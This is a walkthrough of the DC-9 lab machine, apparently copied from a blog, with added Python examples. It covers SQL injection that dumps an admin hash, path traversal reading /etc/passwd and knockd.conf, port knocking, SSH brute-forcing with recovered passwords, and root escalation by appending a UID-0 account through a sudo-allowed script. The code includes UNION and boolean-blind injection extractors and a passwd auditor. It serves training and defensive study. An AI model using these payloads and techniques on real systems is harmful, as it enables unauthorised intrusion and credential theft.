[01:09:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:09:16] [INFO] fetching entries of column(s) 'Password,Username' for table 'Users' in database 'Staff'
[01:09:16] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] N
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

[01:09:25] [INFO] table 'Staff.Users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.190/dump/Staff/Users.csv'                                                                                                                      
[01:09:25] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:09:25] [WARNING] your sqlmap version is outdated

[*] ending @ 01:09:25 /2023-02-14/


The hash is a 32-character unsalted MD5 (sqlmap flagged it as md5_generic_passwd), so an online hash lookup site resolves it immediately: the admin password is transorbital1.
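The sqlmap runs above show three techniques working against the same `search` parameter: a boolean-based blind probe (`mary' AND 4078=4078-- `), a time-based probe, and a 6-column UNION. The following is an added example, not code from the original write-up or from the DC-9 application, that models the injectable query on sqlite3 so it runs offline. It shows the vulnerable string-built query beside its parameterised fix, the UNION dump of Staff.Users, and a hand-rolled boolean-blind extractor that recovers the admin hash one hex digit at a time, which is the work sqlmap automates when only a true/false channel exists. The StaffDetails column layout and all rows except the admin hash are constructed assumptions; the Users table and the hash 856f5de590ef37314e7c3bdf6f8a66dc are what sqlmap dumped.

```python
import sqlite3

# Constructed sample data. StaffDetails layout is an assumption (6 columns,
# matching the UNION column count sqlmap found); Users mirrors the real dump.
STAFF_ROWS = [
    (1, "Mary", "Moe", "Sales", "5551234", "marym@example.com"),
    (2, "Fred", "Flintstone", "Ops", "5552345", "fredf@example.com"),
]
USERS_ROWS = [(1, "admin", "856f5de590ef37314e7c3bdf6f8a66dc")]
ADMIN_HASH = USERS_ROWS[0][2]


def build_db():
    """In-memory stand-in for the Staff database. COLLATE NOCASE mimics MySQL's
    case-insensitive default collation so that 'mary' matches 'Mary'."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE StaffDetails (id INTEGER, firstname TEXT COLLATE NOCASE, "
        "lastname TEXT COLLATE NOCASE, position TEXT, phone TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO StaffDetails VALUES (?,?,?,?,?,?)", STAFF_ROWS)
    conn.execute("CREATE TABLE Users (UserID INTEGER, Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?,?,?)", USERS_ROWS)
    return conn


def search_vulnerable(conn, term):
    """The bug: user input is pasted into the SQL text, so a quote ends the
    string literal and the rest of the input becomes SQL."""
    sql = (f"SELECT * FROM StaffDetails WHERE firstname = '{term}' "
           f"OR lastname = '{term}'")
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """The fix: a bound parameter is always data, never SQL syntax."""
    sql = "SELECT * FROM StaffDetails WHERE firstname = ? OR lastname = ?"
    return conn.execute(sql, (term, term)).fetchall()


def union_dump(conn):
    """sqlite form of sqlmap's 6-column UNION payload (MySQL CONCAT -> ||).
    UNIONed rows carry NULL in the id column, which is how they are picked out."""
    payload = ("mary' UNION ALL SELECT NULL,NULL,NULL,NULL,"
               "Username||':'||Password,NULL FROM Users-- -")
    return [row[4] for row in search_vulnerable(conn, payload) if row[0] is None]


def boolean_oracle(conn, condition):
    """Boolean-based blind primitive: Mary's row comes back only when the
    injected condition is true, exactly like sqlmap's AND 4078=4078 probe."""
    payload = f"mary' AND ({condition})-- -"
    return len(search_vulnerable(conn, payload)) > 0


def blind_extract_hash(conn, length=32):
    """Recover the admin MD5 one hex digit at a time using only the oracle."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            cond = ("SUBSTR((SELECT Password FROM Users WHERE Username='admin'),"
                    f"{pos},1)='{ch}'")
            if boolean_oracle(conn, cond):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("UNION dump:", union_dump(db))
    print("blind extract:", blind_extract_hash(db))
    print("same payload against the parameterised query:",
          search_safe(db, "mary' AND 1=1-- -"))
```

The blind extractor needs 16 oracle queries per character in the worst case (512 for a 32-digit MD5); sqlmap narrows that with binary search on the character code, but the primitive is the same. Note that `search_safe` returns nothing for the payload because the whole string, quote and all, is compared against the name column as data.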

But the ssh port is still filtered, so the password cannot be used there yet.

The file inclusion lead from earlier should be the right direction; it most likely just needs the authenticated session cookie added to the request.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ wfuzz -c -u http://192.168.56.190/manage.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Cookie:PHPSESSID=pn3khsirub7ln7vqqbpn1oobu2" --hw 100
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.190/manage.php?FUZZ=../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                      
=====================================================================

000000759:   200        93 L     172 W      3694 Ch     "file"     
http://192.168.56.190/manage.php?file=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash
wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash

Checked whether remote file inclusion is possible as well; testing shows it is not.

The biggest obstacle right now is that port 22 is filtered rather than closed, which strongly suggests port knocking is in use.

The knockd service normally keeps its configuration in /etc/knockd.conf, so use the file inclusion to read that file.

Request:

http://192.168.56.190/manage.php?file=../../../../etc/knockd.conf
File does not exist
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

So after a SYN to each of ports 7469, 8475 and 9842, in that order and all within 25 seconds (seq_timeout), knockd inserts an iptables rule that lets our source IP reach port 22; the reverse sequence removes it again. A plain connect attempt is enough for each knock because the rule only matches the SYN flag.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nmap -p 7469 192.168.56.190  
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 01:35 EST
Nmap scan report for localhost (192.168.56.190)
Host is up (0.00068s latency).

PORT     STATE  SERVICE
7469/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nmap -p 8475 192.168.56.190
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 01:35 EST
Nmap scan report for bogon (192.168.56.190)
Host is up (0.00056s latency).

PORT     STATE  SERVICE
8475/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nmap -p 9842 192.168.56.190
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 01:36 EST
Nmap scan report for localhost (192.168.56.190)
Host is up (0.00051s latency).

PORT     STATE  SERVICE
9842/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nmap 192.168.56.190        
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 01:36 EST
Nmap scan report for bogon (192.168.56.190)
Host is up (0.00080s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
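The three single-port nmap runs above work as a knock because each sends one SYN and they all landed inside the 25-second window. As an added example (not from the original write-up or the knockd project), the script below parses the recovered knockd.conf, extracts the openSSH sequence, knocks with ordinary TCP connects paced well inside seq_timeout, and then checks whether 22/tcp has opened. The configuration text is a constructed copy of what manage.php returned; the target address and the `connect` hook (there so the knock order can be tested offline) are assumptions.

```python
import socket
import time

# Constructed copy of the knockd.conf read through manage.php above.
KNOCKD_CONF = """\
[options]
    UseSyslog
[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd_conf(text):
    """Return {section: {key: value}} for a knockd.conf body. Bare words such
    as UseSyslog become flags (True); key = value pairs keep their raw string."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and padding
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = (p.strip() for p in line.split("=", 1))
            sections[current][key] = value
        elif current is not None:
            sections[current][line] = True
    return sections


def sequence_of(section):
    """Port list of a knockd section. knockd also accepts 'port:udp' items;
    the protocol tag is stripped here because only tcp knocks are sent."""
    return [int(item.strip().split(":", 1)[0])
            for item in section["sequence"].split(",")]


def knock(host, ports, delay=0.5, timeout=1.0, connect=None):
    """Send one SYN per port in order. A connect() that is refused or times out
    still put a SYN on the wire, which is all tcpflags = syn looks for."""
    if connect is None:
        def connect(h, p):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(timeout)
            try:
                s.connect((h, p))
            except OSError:
                pass                      # expected: nothing listens there
            finally:
                s.close()
    sent = []
    for p in ports:
        connect(host, p)
        sent.append(p)
        time.sleep(delay)
    return sent


def port_open(host, port, timeout=1.0):
    """True if a full TCP handshake to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.56.190"  # assumed
    conf = parse_knockd_conf(KNOCKD_CONF)
    seq = sequence_of(conf["openSSH"])
    window = int(conf["openSSH"]["seq_timeout"])
    # Every knock must arrive inside seq_timeout; pace them well within it.
    knock(target, seq, delay=min(0.5, window / (2 * len(seq))))
    print("22/tcp open after knock:", port_open(target, 22))
```

Run it as `python3 knock.py 192.168.56.190`; knocking the closeSSH sequence afterwards removes the rule, which is worth doing at the end of an engagement so the host is left as it was found.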

Turn the usernames and passwords obtained earlier into two separate wordlists and try them against ssh.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ hydra -L user -P pass ssh://192.168.56.190          
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-14 02:15:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.56.190:22/
[22][ssh] host: 192.168.56.190   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.56.190   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.56.190   login: janitor   password: Ilovepeepee
[STATUS] 284.00 tries/min, 284 tries in 00:01h, 8 to do in 00:01h, 13 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-14 02:17:01

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ ssh janitor@192.168.56.190
The authenticity of host '192.168.56.190 (192.168.56.190)' can't be established.
ED25519 key fingerprint is SHA256:QqKiAU3zrowiN9K1SVvmSWvLBZAqdSpT0aMLTwGlyvo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.190' (ED25519) to the list of known hosts.
janitor@192.168.56.190's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ id
uid=1016(janitor) gid=1016(janitor) groups=1016(janitor)
janitor@dc-9:~$ ls -alh
total 16K
drwx------  4 janitor janitor 4.0K Feb 14 17:16 .
drwxr-xr-x 19 root    root    4.0K Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4.0K Feb 14 17:16 .gnupg
drwx------  2 janitor janitor 4.0K Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls -alh
total 12K
drwx------ 2 janitor janitor 4.0K Dec 29  2019 .
drwx------ 4 janitor janitor 4.0K Feb 14 17:16 ..
-rwx------ 1 janitor janitor   66 Dec 29  2019 passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Add these six passwords to the wordlist built earlier with cewl to form a new password dictionary, then rerun hydra with it.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ cp user pass.dict                         
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ vim pass.dict    
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ hydra -L user -P pass.dict ssh://192.168.56.190
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-14 19:48:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.56.190:22/
[22][ssh] host: 192.168.56.190   login: fredf   password: B4-Tru3-001

This also yields fredf's password.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ ssh fredf@192.168.56.190
fredf@192.168.56.190's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$ cat /opt/devstuff/dist/test/test

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

Privilege escalation

fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test
Usage: python test.py read append
fredf@dc-9:~$ cd /opt/devstuff
fredf@dc-9:/opt/devstuff$ ls -alh
total 28K
drwxr-xr-x 5 root root 4.0K Dec 29  2019 .
drwxr-xr-x 4 root root 4.0K Dec 29  2019 ..
drwxr-xr-x 3 root root 4.0K Dec 29  2019 build
drwxr-xr-x 3 root root 4.0K Dec 29  2019 dist
drwxr-xr-x 2 root root 4.0K Dec 29  2019 __pycache__
-rw-r--r-- 1 root root  250 Dec 29  2019 test.py
-rw-r--r-- 1 root root  959 Dec 29  2019 test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
fredf@dc-9:/opt/devstuff$ 

test.py reads any file and appends its contents to any other file, and sudo runs it as root with no password. So we can write an extra passwd entry with UID 0 (and a password hash we know) to a file of our own and use the test binary to append it to /etc/passwd.

fredf@dc-9:/tmp$ echo 'jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash' > newuser
fredf@dc-9:/tmp$ cat newuser
jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash
fredf@dc-9:/tmp$ chmod 777 newuser
fredf@dc-9:/tmp$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test newuser /etc/passwd
fredf@dc-9:/tmp$ su - jason
Password: 
root@dc-9:~# cd /root
root@dc-9:~# ls -alh
total 32K
drwx------  5 root root 4.0K Dec 29  2019 .
drwxr-xr-x 18 root root 4.0K Dec 29  2019 ..
lrwxrwxrwx  1 root root    9 Dec 29  2019 .bash_history -> /dev/null
-rwx------  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Dec 29  2019 .cache
drwx------  3 root root 4.0K Dec 29  2019 .gnupg
drwx------  3 root root 4.0K Dec 29  2019 .local
-rwx------  1 root root  148 Aug 18  2015 .profile
-rwx------  1 root root 1.8K Dec 29  2019 theflag.txt
root@dc-9:~# cat theflag.txt


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.


root@dc-9:~# 

Notes:

1. Given how test.py works, the new user entry has to be stored in a file first; the test binary then reads that file and appends it to /etc/passwd.

2. The chmod 777 is not actually required: the binary runs as root via sudo and root reads the file regardless of its mode. What does matter is that the file holds a single well-formed seven-field passwd line ending in a newline, and that the hash in the second field is one you generated yourself (the page does not show how this one was produced).
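As an added example (not from the original write-up), the following builds the UID-0 entry safely and, more usefully for the defensive side, audits a passwd file for exactly the artefacts this escalation leaves behind: a non-root account with UID 0, a duplicate UID, and a password hash sitting in /etc/passwd instead of /etc/shadow. The sample file is a constructed excerpt of the box's /etc/passwd with the jason line from above appended; the hash is copied from the page and was generated out of band (for example with `openssl passwd -6`, which is not shown on the page).

```python
# Constructed excerpt: real lines from the DC-9 /etc/passwd plus the
# appended "jason" entry. The hash is the one used in the write-up.
JASON_HASH = ("$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi."
              "EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41")
PASSWD_SAMPLE = f"""\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
jason:{JASON_HASH}:0:0:root:/root:/bin/bash
"""

# Values in the password field that mean "no hash here, look in /etc/shadow".
SHADOWED = {"x", "*", "!", "!!", ""}


def make_uid0_entry(name, crypt_hash, gecos="root", home="/root", shell="/bin/bash"):
    """Build the line handed to the test binary. Rejects ':' and newlines,
    which would split the entry into extra fields or extra lines."""
    for value in (name, crypt_hash, gecos, home, shell):
        if ":" in value or "\n" in value:
            raise ValueError(f"illegal character in passwd field: {value!r}")
    return f"{name}:{crypt_hash}:0:0:{gecos}:{home}:{shell}"


def parse_passwd(text):
    """Parse passwd(5) text into dicts; malformed lines raise so a broken
    append is noticed before it locks anyone out."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "password": pw, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home,
                        "shell": shell})
    return entries


def audit_passwd(text):
    """Return the findings a defender should raise on this file."""
    findings = []
    entries = parse_passwd(text)
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{e['name']}: non-root account with UID 0")
        if e["password"] not in SHADOWED:
            findings.append(f"{e['name']}: password hash stored in /etc/passwd "
                            "instead of /etc/shadow")
    by_uid = {}
    for e in entries:
        by_uid.setdefault(e["uid"], []).append(e["name"])
    for uid, names in by_uid.items():
        if len(names) > 1:
            findings.append(f"uid {uid} shared by {', '.join(names)}")
    return findings


if __name__ == "__main__":
    print(make_uid0_entry("jason", JASON_HASH))
    for finding in audit_passwd(PASSWD_SAMPLE):
        print("FINDING:", finding)
```

Running the audit against a pristine /etc/passwd returns an empty list; against the post-exploitation file it reports the jason entry three ways, which is also the check to run before and after an engagement to confirm the backdoor account has been removed.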

From: https://www.cnblogs.com/jason-huawen/p/17121500.html
